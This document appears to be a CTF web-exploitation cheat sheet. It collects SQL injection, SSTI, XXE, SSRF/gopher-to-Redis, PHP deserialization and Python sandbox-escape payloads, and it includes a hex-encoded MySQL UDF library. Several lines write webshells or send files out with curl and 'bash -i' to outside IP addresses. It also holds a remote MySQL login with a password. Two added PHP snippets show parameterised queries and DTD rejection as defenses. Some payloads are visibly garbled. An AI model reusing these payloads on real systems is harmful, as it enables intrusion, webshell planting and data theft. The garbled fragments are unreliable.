<? echo 123;?>   # requires the config option short_open_tag=on

The phar:// wrapper can read the contents of an archive with any extension, e.g. .zip.

Because the challenge has a file-writing function, a phar file can be written with file_put_contents and phar deserialization then triggered with file_put_contents. Both operations must finish before the file is deleted, so a race condition is needed.

.htaccess:
AddType application/x-httpd-php .xxx
php_value auto_append_file php://filter/convert.base64-decode/resource=shell.xxx

Character bypasses

Trick: on Linux, 1.php. is a legal file name; the system does not strip the trailing dot and run the file as PHP, so the dot bypass only works on Windows, likewise 1.php/.

Hex escapes can bypass: change s to S

// change lowercase s to uppercase S; after processing, \75 is the hex code for u, and the bypass succeeds

$a = 'O:4:"test":1:{S:8:"\75sername";s:5:"admin";}';

GET: ?web=O:3:"syc":1:{S:5:"lo\76er";s:18:"assert($_POST[1]);";}

POST: 1=<code to execute>

The fix was to change https to http (https is too secure, sob). Remember to choose the base64 encoder.

POP-chain construction: when calling a function inside eval, remember system('ls');

if (';' === preg_replace('/\s()?((?R)?)/', '', $var)) {

Regular expression /[oc]:\d:/i: filters the two forms o:digit: and c:digit:

\W (note the uppercase W) matches characters that are not letters, digits or underscores, i.e. [^A-Za-z0-9_].

So \W is the negation of \w, which matches letters, digits and underscores.

s flag: lets . match newlines as well.

(\s)*: zero or more whitespace characters (space, tab, form feed)

(\n): one or more newline characters

/i: case-insensitive matching

[^\s()] matches any character except space, left parenthesis and right parenthesis.

Digits and lowercase letters banned: use ${IFS}-style expansions; if the contents of an environment variable are given, construct nl from it to display the file.

Ref: ctfshow 构造{IFS} - 简书 (challenge 117)

%0aphp: with multi-line matching, %0a is a newline

POST /?ctf=a%A2%A%7Bi%A0%BO%A%A%22CCC%22%A%A%7Bs%A1%A%22a%22%B%Bs%A1%A%22c%22%BO%A%A%22AAA%22%A2%A%7Bs%A1%A%22s%22%BO%A%A%22BBB%22%A1%A%7Bs%A6%A%22%00BBB%00b%22%Bs%A20%A%22.%2F%F%F%F%2F%F%F%F%F%F%F%F%F%5B%40-%5B%5D%22%B%7Ds%A1%A%22a%22%Bs%A4%A%22eval%22%B%7Ds%A1%A%22b%22%BR%A%B%7Di%A0%B%B%7D HTTP/1.1
Host: localhost
User-Agent: python-requests/2.1.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 155
Content-Type: multipart/form-data; boundary=c25447769cf9fc1afc1ede702b4279d

--c25447769cf9fc1afc1ede702b4279d
Content-Disposition: form-data; name="file"; filename="file"

#/bin/sh
cat /*
--c25447769cf9fc1afc1ede702b4279d--

POST /?ctf=O%A%A%22CCC%22%A%A%7Bs%A1%A%22c%22%BO%A%A%22AAA%22%A2%A%7Bs%A1%A%22s%22%BO%A%A%22BBB%22%A1%A%7Bs%A1%A%22b%22%Bs%A20%A%22.%2F%F%F%F%2F%F%F%F%F%F%F%F%F%5B%40-%5B%5D%22%B%7Ds%A1%A%22a%22%Bs%A9%A%22lewiserii%22%B%7Ds%A1%A%22a%22%B%Bs%A1%A%22b%22%BR%A6%B% HTTP/1.1
Host: 192.168.100.100:100
Content-Length: 186
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0xXn6nlxZVqh49pS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundary0xXn6nlxZVqh49pS
Content-Disposition: form-data; name="file"; filename=""
Content-Type: text/plain

cat /f*
------WebKitFormBoundary0xXn6nlxZVqh49pS--

set_error_handler

ool injection

java.lang.Runtime.getRuntime().exec("curl http://`47.99.125.16/`cat /flag`")

java.lang.Runtime.getRuntime().exec("bash -c {echo,curl  http://`cat /flag`.os4jtkl.requestrepo/}|{base64,-d}|{bash,-i}")

java.lang.Runtime.getRuntime().exec("bash -c {echo,YVybCAgaHR0cDovL2BjYXQgL2ZsYWdgLm9zMzRqdGtsLnJlcXVlcRyZXBvLmvbS8=}|{base64,-d}|{bash,-i}")

new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /flag").getInputStream())).readLine()

new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cat /flag").getInputStream())

Use the tool's OQL query feature: searching for the keyword password yields the database connection password. The query:

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
or
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))

SQL injection

(select 'admin' username, '12' password)a

Creating a new table

Updating a table (UPDATE)

1';upDate%09items%09set%09price=1%09Where%09id=8;#

The closing quote is not always '; it may be ".

Universal password: ' or 1=1--

admin*\order*\by**\#

Injection 1:

' or 1=1 order by 3#

a union select 1,database(),3 #

a union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3#

a union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='web2' and table_name='flag'),3#

The queried data is echoed back, so this is a UNION injection; next, determine the number of columns.

?id=TMP0919' Order by 1#

Check the echo

?id=1' uNion Select 1,2,3,4,5#

Query table names

?id=1' uNion Select ((sElect grOup_cOncat(tAble_name) From infOrmation_schema.tables Where Table_schema=Database())),2,3,4,5%23

Query column names

?id=1' uNion Select ((sElect grOup_cOncat(column_name) From infOrmation_schema.columns Where Table_name='here_is_flag')),2,3,4,5%23

Query the flag value:

?id=1' uNion Select ((sElect grOup_cOncat(flag) From here_is_flag)),2,3,4,5%23

0' union select 1#

The password is 1

ᴬᴰᴹᴵᴺ

'^0#   the quote closes the string, # comments out the rest, ^ is XOR and = is equality. This relies on MySQL's weak type conversion: an empty string XOR 0 matches every record whose value does not start with a digit.

admin plus trailing spaces to bypass (SQL constraint attack)

userid=1' union select '<?php eval($_POST[1]);?>' into outfile '/var/www/html/shell.php'#&userpwd=1

Brute-forcing the session secret

Places the secret may live: ..././..././..././etc/config.py

python .\flask_session_cookie_manager.py decode -c eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDMV1JoZEdFPSJ9fQ.XyEaww.Iwc6W-s4ACfLuJX9SYhvTPbb1k -s 82.5659952704

python .\flask_session_cookie_manager.py encode -s 82.5659952704 -t "{ username : b }"

Test data:

1;show databases;#

HANDLER injection

';handler `191981091114514` open;handler `191981091114514` read first#

Concatenation injection

1';PREPARE st from concat('s','elect',' * from `191981091114514`');EXECUTE st;#

Boolean-based blind injection

if(1=1,1,sleep(3)) // 1=1 always holds, so 1 is returned

if(1=2,1,sleep(3)) // 1=2 is false, so the sleep() runs and the response is delayed by 3 seconds

1'&&sleep(5)#

if(length((select(flag)from(flag)))=42,1,0)

id=if((ascii(substr((select(flag)from(flag)),$1$,1)))=$ace,1,0)

Special methods

Use mysql.innodb_table_stats instead of information_schema, and database_name instead of table_schema.

Query table names with:
select group_concat(table_name) from mysql.innodb_table_stats where database_name=database()
Skip dumping column names and dump the values directly.
Table names:
-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22

Column-less injection (table name known)

?username=joe'union/**/select/**/a/**/from/**/(select/**/1,2/**/as/**/a/**/union/**/select/**/*/**/from/**/flag)/**/as/**/q%23

mysql.innodb_column_stats does not exist, so column names cannot be looked up. The idea: since there is no column name, give the column an alias, then carry on injecting normally through the alias.

//-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22

Testing the column count

1'/**/group/**/by/**/22,

Stacked queries

';handler FlagHere open;handler FlagHere read first#   read the table

1';PREPARE st from concat('s','elect',' * from FlagHere');EXECUTE st;#

Common bypasses

1. The result may not contain the string flag

if($row->username!=='flag')

A. -1' union select to_base64(username),hex(password) from ctfshow_user2 --

2. flag is not allowed

if(!preg_match('/flag/i', json_encode($ret))){

A. -1' union select 1,2,password from ctfshow_user3 where username='flag' --

3. Digits are not allowed

if(!preg_match('/flag|[0-9]/i', json_encode($ret))){

A. -1' union select replace(username,'g','j'),replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'g','j') from ctfshow_user4 where username='flag' --
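The parameterised form of the login and lookup queries that the injections in this section target, as an added example that is not part of the original notes. It uses an in-memory SQLite database (my choice, so it runs without a MySQL server; the PDO calls are the same for MySQL) and a constructed users table; the pdo_sqlite extension is assumed.

```php
<?php
// Added example, not from the original notes. Assumes the pdo_sqlite extension.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed schema and rows for the demonstration (plaintext passwords only
// to keep the example short; real code stores password_hash() output).
$pdo->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
$pdo->exec("INSERT INTO users (username, password) VALUES ('admin', 's3cret'), ('flag', 'ctfshow{constructed}')");

// Vulnerable: user input is spliced into the SQL text, so a quote ends the
// string and the rest of the input becomes SQL (the "' or 1=1--" pattern above).
function login_vulnerable(PDO $pdo, string $user, string $pass): array
{
    $sql = "SELECT id, username FROM users WHERE username='$user' AND password='$pass'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: values are bound parameters and never become part of the SQL text,
// so quotes, comment sequences and UNION keywords are just characters in a string.
function login_safe(PDO $pdo, string $user, string $pass): array
{
    $stmt = $pdo->prepare("SELECT id, username FROM users WHERE username = :u AND password = :p");
    $stmt->execute([':u' => $user, ':p' => $pass]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Identifiers (an ORDER BY column, a table name) cannot be bound as parameters,
// so they are checked against an allow-list instead of being interpolated freely.
function list_users(PDO $pdo, string $orderBy): array
{
    $allowed = ['id', 'username'];
    if (!in_array($orderBy, $allowed, true)) {
        throw new InvalidArgumentException('unexpected sort column');
    }
    return $pdo->query("SELECT id, username FROM users ORDER BY $orderBy")->fetchAll(PDO::FETCH_ASSOC);
}

$payload = "' or 1=1--";   // from the "universal password" entry above
echo "vulnerable:\n";
print_r(login_vulnerable($pdo, $payload, 'x'));
echo "safe:\n";
print_r(login_safe($pdo, $payload, 'x'));
echo "allow-listed ORDER BY:\n";
print_r(list_users($pdo, 'username'));
try {
    list_users($pdo, '1; DROP TABLE users');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

The stacked-query, HANDLER and PREPARE tricks earlier in this section all depend on the same thing as the login payload: input reaching the SQL parser as text. A bound parameter never does, which is why prepared statements close every variant at once; the only part that still needs care is the identifier position, handled here by the allow-list.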

Flask challenges

__import__('os').popen('cat /f*').read()

local_file:///sys/class/net/eth0/address

Flask PIN calculation

1. username: the user flask runs as (read /etc/passwd)
2. (modname) default value flask.app
3. appname: default flask
4. The absolute path of app.py inside the flask library, obtainable from an error message (/etc/pass)
5. uuid.getnode(): read /sys/class/net/eth0/address and convert the MAC address from hex to decimal; change the interface name as needed
6. (correction) /proc/sys/kernel/random/boot_id

/proc/self/cgroup shows whether this is docker

/proc/sys/kernel/rand]

/etc/machine-id and /proc/self/cgroup concatenated form the second half

/proc/sys/kernel/random/boot_id + /proc/self/cgroup

import os

os.popen('ls /').read()

random.random = uuidnode

Read the files with python2

import random
random.seed(0x0242ae0295f6)
print(str(random.random()*2))

local_file:///

Flask worked example

flask disk

· Topics: Phar deserialization, gzip compression, blind RCE

· FLAG: dynamic

· Steps

Visiting admin manage asks for a PIN, which means flask has debug mode on.

With debug mode on, app.py is reloaded as soon as the source file is modified.

So uploading an app.py that can RCE, overwriting the original, is enough. The syntax must be correct, or the app crashes.

from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/')
def index():
    try:
        cmd = request.args.get('cmd')
        data = os.popen(cmd).read()
        return data
    except Exception:
        pass
    return '1'

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000, debug=True)

git challenges

Java challenges

XML files holding web information

WEB-INF mainly contains the following files and directories:

/WEB-INF/web.xml: the web application configuration file; describes the servlets and other application components, their configuration and naming rules.

/WEB-INF/classes/: all the class files the site uses, servlet and non-servlet classes alike; these are not packaged in .jar files.

/WEB-INF/lib/: the JAR files the web application needs; holds jars used only by this application, such as database drivers.

/WEB-INF/src/: source directory, with the Java files laid out by package name.

/WEB-INF/database.properties: database configuration file.

Example

<servlet>
<servlet-name>FlagController</servlet-name>
<servlet-class>com.FlagController</servlet-class>
</servlet>

filename=/WEB-INF/classes/com/wm/ctf/

Struts tools

May be in env.

JWT challenges

(a dot must be appended at the end)

local_file:///sys/class/net/eth0/address

XXE challenges

Example 1: file read with echoed output

<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<paidx0>
<ctfshow>&xxe;</ctfshow>
</paidx0>

Example 2: blind (no echo)

%remote; %send; ]>
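Parsing the document from example 1 with and without external entity expansion, as an added example that is not part of the original notes. The XML is the challenge document with the SYSTEM target changed to /etc/hostname; the function names are mine, and PHP 7.1+ with ext/dom is assumed.

```php
<?php
// Added example, not from the original notes. The document is the one from
// example 1 above, pointed at /etc/hostname instead of /flag for the demo.
$xml = <<<'XML'
<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<paidx0>
<ctfshow>&xxe;</ctfshow>
</paidx0>
XML;

function ctfshow_text(DOMDocument $doc): ?string
{
    $node = $doc->getElementsByTagName('ctfshow')->item(0);
    return $node ? $node->textContent : null;
}

// Vulnerable: LIBXML_NOENT asks libxml to substitute entities, including the
// injected SYSTEM entity, so on an affected PHP/libxml build the file content
// is what comes back for <ctfshow>.
function parse_vulnerable(string $xml): ?string
{
    $doc = new DOMDocument();
    if (!@$doc->loadXML($xml, LIBXML_NOENT)) {
        return null;
    }
    return ctfshow_text($doc);
}

// Hardened: any DOCTYPE (and therefore any entity declaration) is refused before
// parsing, LIBXML_NOENT is never passed, and LIBXML_NONET stops libxml from
// fetching anything over the network even if a declaration slipped through.
function parse_safe(string $xml): ?string
{
    if (stripos($xml, '<!DOCTYPE') !== false || stripos($xml, '<!ENTITY') !== false) {
        throw new InvalidArgumentException('DTD and entity declarations are not accepted');
    }
    $doc = new DOMDocument();
    if (!@$doc->loadXML($xml, LIBXML_NONET | LIBXML_NOERROR)) {
        throw new InvalidArgumentException('malformed XML');
    }
    return ctfshow_text($doc);
}

echo "vulnerable parser: ", var_export(parse_vulnerable($xml), true), "\n";
try {
    parse_safe($xml);
} catch (InvalidArgumentException $e) {
    echo "safe parser: rejected ({$e->getMessage()})\n";
}
// A plain document without a DOCTYPE still parses normally through the safe path.
echo "safe parser, clean input: ", var_export(parse_safe('<paidx0><ctfshow>hello</ctfshow></paidx0>'), true), "\n";
```

Rejecting the DOCTYPE outright is the simplest rule to audit: it also covers example 2, where the parameter entities %remote; and %send; carry the data out-of-band, because those can only be declared inside a DTD.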

SSRF challenges

file:// protocol

With output echoed back, the file protocol reads the contents of any file.

dict:// protocol

Leaks installed software versions, inspects ports, operates internal Redis services, and so on.

gopher:// protocol

gopher can issue GET and POST requests: capture a GET or POST request first, then rebuild it as a gopher request. gopher is the most powerful protocol in SSRF exploitation (the "universal protocol") and can be used for a reverse shell.

Example

Attacking MySQL without a password

python2 gopherus.py --exploit mysql
root
select '<?php @eval($_POST["cmd"]);?>' into outfile '/var/www/html/aa.php';

MySQL arbitrary file read vulnerability

1. Run a rogue MySQL server listening on a Tencent Cloud host; the victim connects, and the command entered retrieves the file.

Remote connection

mysql -h 1.14.108.19 -P 3306 -u root -pygyjl694YG. blog

Writing a webshell

Catch-all list

UNION-based query: #
?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into outfile 'C:\info.php'%23
?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into dumpfile 'C:\info.php'%23

Non-UNION query #

When UNION cannot be used, FIELDS TERMINATED BY / LINES TERMINATED BY can write the shell:

?id=1 into outfile 'C:\info.php' FIELDS TERMINATED BY '<?php phpinfo();?>'%23

MySQL root privilege escalation

Summary

show global variables like '%secure%';

The secure_file_priv option restricts the directories used for import and export.

If it is empty, there is no directory restriction: any directory works.

If it is set to NULL, the MySQL server forbids import and export entirely.

Writing a webshell directly fails because there is no write permission on the web root.

Alternative: UDF privilege escalation to run system commands.

The plugin_dir option specifies the plugin directory.

show global variables like '%plugin%';

Writing the .so:

SET @file_content = LOAD_FILE('C:/Users/admin/Desktop/lib_mysqludf_sys_64.so');
INSERT INTO people (cmd) VALUES (HEX(@file_content));
SELECT hex(load_file('/lib_mysqludf_sys_64.so'));

Writing the .so file (hex dump)

SELECT 0x7f454c46020101000000000000000000000e0001000000d00c0000000000004000000000000000e818000000000000000000004000800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d00000016000000000000001000000000000000000000012000000200000010000000250000001a0000000f000000000000000000000000000000000000001b0000000000000000000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c000000000000000000000000000000000000000000000002000000000000001100000014000000020000000700000080080499119c4c9da44009804688140000001600000017000000190000001b0000001d000000200000002200000000000000200000000000000240000002500000027000000290000002a00000000000000ce2cc0ba67c7690ebdef0e78722788b98df10ed871581cc1e2f7dea868be12bbe927c7e8b92cd1e7066a9cf9bfba745bb0771974ec445d5ecc5a62c1cc18aff6ac68aeb9fd4a0ac7d1c525681b20b5911feab5fbe12000000000000000000000000000000000000000000000000000000000000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000
(hex-encoded udf.so payload) INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';

select sys_eval('env');

The URL must be double URL-encoded.

Attacking Redis

Fingerprint: curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

python2 gopherus.py --exploit redis
PHP shell:
<?php eval($_POST['cmd']);?>

gopher://127.0.0.1:679/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A%250D%250A%2524%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252428%250D%250A%250A%250A%25C%25Fphp%2520eval%2528%2524_POST%255B1%255D%2529%25B%25F%25E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%2524%250D%250Aset%250D%250A%2524%250D%250Adir%250D%250A%25241%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%2524%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

1 is the password.

Redis master-slave replication

dict protocol, step by step:
dict://127.0.0.1:6379/info
dict://127.0.0.1:6379/config:set:dir:/tmp            // set the directory
dict://127.0.0.1:6379/config:get:dir                 // read it back
dict://127.0.0.1:6379/config:set:dbfilename:exp.so
dict://127.0.0.1:6379/slaveof:49.22.224.59:6379
dict://127.0.0.1:6379/module:load:./exp.so           // load exp.so
dict://127.0.0.1:6379/:env                           // command execution

Gopher in one go: open /tmp/redis, run it first to obtain the payload, then run the server with python2 to receive the connection.

http/s protocol: probing for live internal hosts
file:///var/www/html/flag.php  --- view the page source

url=http://127.0.0.1/flag.php 

http:/// http:/// http://wifi.aliyun/ http://imis.qq/ http://localhost.sec.qq/ http:/// 

Resolves to 127.0.0.1

url=http://2130706433/flag.php

url=http://sudo/flag.php  (DNS resolution)

url=http://0177.0.0.1/flag.php

Hexadecimal

url=http://0x7F.0.0.1/flag.php

Octal

url=http://0177.0.0.1/flag.php

Decimal integer form

url=http://2130706433/flag.php

Hexadecimal integer form; convert it with the same site as above and remember the 0x prefix

url=http://0x7F000001/flag.php

There is also a special abbreviated form

127.0.0.1 written as 127.1

Using the CIDR range to bypass a localhost check

url=http://127.127.127.127/flag.php

There are many more variants; I won't write them all out

url=http://0/flag.php

url=http://0.0.0.0/flag.php

http://nginx:80/flag.php

http://@nginx/flag.php

http://nginx/flag.php

Length under 5
http://127.1/flag.php
http://0/flag.php

Write a PHP file on your own VPS containing:

<?php header("Location:http://127.0.0.1/flag.php");?>

then pass it via POST

Example 1:

The regex in the code means the url must start with http://ctf. and end with show

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
} 

So we can construct a bypass:

url=http://ctf.@127.0.0.1/flag.php?show

Here ctf. is treated as the user name for logging in to 127.0.0.1, and a show parameter is passed to flag.php so the regex is satisfied.

SSTI challenges

Twig templates

{{_registerUndefinedFilterCallback(exec)}}{{_getFilter(cat /flag)}}

{{url_for.globals.builtins import .popen( ls ).read()}}

Smarty
1. Confirming the vulnerability (check the Smarty version):
{$smarty.version}
2. Conventional exploitation: the {php}{/php} tags execute the PHP wrapped inside them (deprecated in Smarty)
{php}{/php}
Executes PHP; not usable on PHP 7

<script language="php">phpinfo();</script>

3. Static method
public function getStreamVariable($variable)
{
    $_result = '';
    $fp = fopen($variable, 'r');
    if ($fp) {
        while (!feof($fp) && ($current_line = fgets($fp)) !== false) {
            $_result .= $current_line;
        }
        fclose($fp);
        return $_result;
    }
    $smarty = isset($this->smarty) ? $this->smarty : $this;
    if ($smarty->error_unassigned) {
        throw new SmartyException('Undefined stream variable "' . $variable . '"');
    } else {
        return null;
    }
}

Payload 1 (the if tag executes PHP):
{if phpinfo()}{/if}
{if system('ls')}{/if}
{if system('cat /flag')}{/if}
4. Other payloads
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Jinja

Reading modules

`<class 	_frozen_importlib_external.FileLoader	>`

`subprocess.Popen`

Usage: {{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
Enumeration script:
import requests

url = 'http://buuoj:81'
for i in range(1, 100):
    payload = "/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "].__init__['__glo''bals__']}}"
    newurl = url + payload
    res = requests.get(url=newurl)
    if 'builtins' in res.text:
        print(newurl)
    else:
        pass

Use: {{''.__class__.__mro__[2].__subclasses__()[76].__init__['__glo''bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

Single and double quotes filtered

?a=os&b=popen&c=cat /flag&name={{url_for.globalsrequest.args.a(request.).read()}}

If args is filtered, pass the values through another request attribute instead

args -> cookies

[] filtered

?name={{url_for.__globals__.os.popen(a).read()}} Cookie:a=cat /flag

If underscores are filtered, we can use attr: request|attr("a") is equivalent to request["a"]

name={{(lipsum|attr(a)).os.popen(b).read()}}

__ bypass

__class__ == \x5f\x5fclass\x5f\x5f == \x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f

Pass the pieces as parameters and build:

{{(x|attr(x1)|attr(x2)|attr(x3))(x4).eval(x5)}}

Cookie: x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

. filtered

|attr('__class__')

is equivalent to

.__class__

Filtered: . {{ __ ,

'txt.galf_eht_si_siht/ tac'[::-1]  reversed-string bypass

Cookie:a=__globals__;b=cat /flag

{{ filtered

{% print(get_flashed_messages.globals.ospopen.read()) %}

popen filtered

q=[].class.base.subclasses()[189].init.globals builtins ( os ).dict pop  en .read()

Blind SSTI (no output)

/hack?klf={{config.__class__.__init__.__globals__['os'].popen('tac /f*').read()}}  read the file

/hack?klf={{config.__class__.__init__.__globals__['os'].popen('curl 120.46.41.17:902').read()}}

/hack?klf={{config.__class__.__init__.__globals__['os'].popen('curl 120.46.41.17:902/ls /app/f*').read()}}

Payload:?name={%set a=dict(po=aa,p=aa)|join%}{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|count%}{%set k=dict(eeeeeeeee=a)|join|count%}{%set l=dict(eeeeeeee=a)|join|count%}{%set n=dict(eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee=a)|join|count%}{%set m=dict(eeeeeeeeeeeeeeeeeeee=a)|join|count%}{% set b=(lipsum|string|list)|attr(a)(j)%}{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(k)%}{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-l)%}{%set p=((lipsum|attr(c))|string|list)|attr(a)(n)%}{%set q=((lipsum|attr(c))|string|list)|attr(a)(m)%}{%set i=(dict(curl=aa)|join,f,p,dict(cat=a)|join,f,g,dict(flag=aa)|join,p,q,dict(vhthja=a)|join,q,dict(dnslog=a)|join,q,dict(cn=a)|join)|join%}{%if ((lipsum|attr(c))|attr(d)(e)).popen(i)%}atao{%endif%}

Sandbox escape

Most basic: __import__('os').system('cat flag')

Without the characters b and i, single quotes, double quotes or backticks

getattr(getattr(()class__,chr(95)*chr(95)*chr(98)*chr(97)*chr(115)*chr(101)*chr(95)*chr(95)),chr(95)*chr(95)*chr(115)*chr(117)*chr(98)*chr(99)*chr(108)*chr(97)*chr(115)*chr(115)*chr(101)*chr(115)*chr(95)*chr(95))()

到()class.base.subclasses()[-4].init****.globals__ system

Built the same way:

getattr(getattr(getattr(getattr(().class,chr(95)*chr(95)*chr(98)*chr(97)*chr(115)*chr(101)*chr(95)*chr(95)),chr(95)*chr(95)*chr(115)*chr(117)*chr(98)*chr(99)*chr(108)*chr(97)*chr(115)*chr(115)*chr(101)*chr(115)*chr(95)*chr(95))()[*-4],chr(95)*chr(95)*chr(105)*chr(110)*chr(105)*chr(116)*chr(95)*chr(95)),chr(95)*chr(95)*chr(10)*chr(108)*chr(111)*chr(98)*chr(97)*chr(108)*chr(115)*chr(95)*chr(95))chr(115)*chr(121)*chr(115)*chr(116)*chr(101)****chr(109)

_ usage

Character length limit

s<1

eval(input())

then run the above

S<7

First enter help() to get into the help prompt, then type any module name, for example os; the help page for the os module is shown, and typing !sh there drops you into a shell.

Without help()

breakpoint()

then type as normal

The globals() function

Leaks global variables

The Server module has a similar effect

The dir() function

Lists the root (top-level) names

dir(my_flag) to see what is underneath it

my_flag.<method>() to call its methods

Bytes instead of chars

Payload = open('flag').read()

open((bytes([102])+bytes([108])+bytes([97])+bytes([103])).decode()).read()

bytes via the base class

().__class__.__base__.__subclasses__()[6] ---> reach bytes through the base class

().__doc__[1:200] usage

Python accepts Unicode identifiers, so the level-2 payload can be reused with its letters swapped for Unicode equivalents

ｅval(inpｕt())

Bypass method

().__class__.__base__.__subclasses__()[-4].__init__.__globals__[str().join([().__doc__[19],().__doc__[86],().__doc__[19],().__doc__[4],().__doc__[17],().__doc__[10]])](str().join([().__doc__[19],().__doc__[56]]))

_posixsubprocess bypass

Multiple inputs

__builtins__['__loader__'].load_module('_posixsubprocess')

or:

__loader__.load_module('_posixsubprocess')

import os

__loader__.load_module('_posixsubprocess').fork_exec([b'/bin/sh'], [b'/bin/sh'], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False, None, None, None, -1, None)

Alternates between running Python and the shell

Single input

